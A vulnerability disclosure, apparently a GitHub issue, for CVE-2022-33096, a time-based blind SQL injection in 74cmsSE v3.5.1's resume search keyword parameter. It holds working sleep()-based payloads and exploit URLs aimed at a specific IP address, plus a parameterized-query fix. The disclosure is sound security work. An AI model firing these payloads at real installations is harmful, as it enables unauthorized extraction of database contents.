CVE-2022-33096: SQL Injection vulnerability · Issue #9 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a SQL injection vulnerability via the keyword parameter at /home/resume/index.
Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.5.1
Date of Discovery: 21/4/2022
Product version: 74cmsSE_v3.5.1
Download link: http://www.74cms.com/downloadse/show/id/68.html
Vulnerability Description:
74cmsSE_v3.5.1 contains a time-based blind SQL injection that allows an attacker to run arbitrary SQL statements against the backend database and extract sensitive data from it.
POC:
Payload:
/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
In the handler for the path:
/v1_0/home/resume/index
the $keyword parameter is not strictly filtered before it is placed in the SQL query, resulting in SQL injection.
exp1:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(2),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As the screenshot shows, the response is delayed, so the sleep() function is executed and the parameter is injectable in a time-based blind fashion.
Note that with this payload the sleep() call appears to be executed twice per request, so the observed delay is roughly double the argument passed to sleep().
The same delay can be used to infer the length of the database name:
exp2:
http://124.223.95.129:8766/v1_0/home/resume/index?__r=1&district1=&district2=&district3=&education=&experience=&keyword=/*%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27*/&major=&maxage=&maxwage=&minage=&minwage=&page=1&pagesize=10&settr=&sex=&tag=
As the screenshot shows, the delay is exactly double length(database()). The database name is already known from the arbitrary file read vulnerability to be "qscms2" (6 characters), which matches a delay of about 12 seconds with sleep() executed twice, so the injection is confirmed as a time-based blind SQL injection.
Suggested fix: bind the keyword parameter with a prepared statement (parameterized query) instead of concatenating it into the SQL string; if the framework's query builder is used, pass the value as a bound parameter rather than as raw SQL, and at minimum apply strict filtering to this parameter.